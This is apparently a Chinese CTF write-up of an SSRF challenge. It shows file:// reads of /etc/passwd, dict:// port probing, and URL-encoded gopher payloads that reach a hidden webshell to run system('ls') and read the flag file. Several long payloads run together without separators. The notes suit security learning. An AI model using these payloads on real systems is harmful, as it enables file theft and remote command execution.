ssrf漏洞 CTF
扫描
/index.php
/robots.txt
User-agent: *
Disallow: /webshe11231231231.phphttp://*:8016/index.php?url=www.baidu.com
http://*:8016/index.php?url=file:///etc/passwd 读取文件
http://*:8016/index.php?url=file:///var/www/html
http://*:8016/index.php?url=file:///usr/share/html
http://*:8016/index.php?url=file:///var/www/html/webshe11231231231.php
需要在本地进行访问,所以
在repeater里面右上角设置target 127.0.0.1 80
GET /index.php?url=file:///var/www/html/webshe11231231231.php
改为
GET //webshe11231231231.php
POST //webshe11231231231.php
hacker=phpinfo();&admin=h1admin
hacker=system('ls')&admin=h1admin
坑比较多,首先你必须要添加 上面这种命令,另外你还需要对post进行定义
Content-Type:application/x-www-form-urlencoded
Content-Length: 34 长度和上述字符一致
http://*:8016/index.php?url=dict:///127.0.0.1:80 探测端口
gopher协议进行打包发送 利用本地shell
tmp=urllib.quote(test)
new =temp.replace(''%0A","%0D%0A") ## /r/n /r
result='_'+urllib.quote(new) ## 第一个包是无效的
print(result)
进行转码,然后直接
_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250Aview-source:http://*:8016/index.php?url=gopher://127.0.0.1:80/_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527cat%2520fl1234aaaaaggggg.php%2527%2529%253B%250D%250Ahttp://*:8016/?url=gopher://127.0.0.1:80/_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527cat%2520fl1234aaaaaggggg.php%2527%2529%253B%250D%250A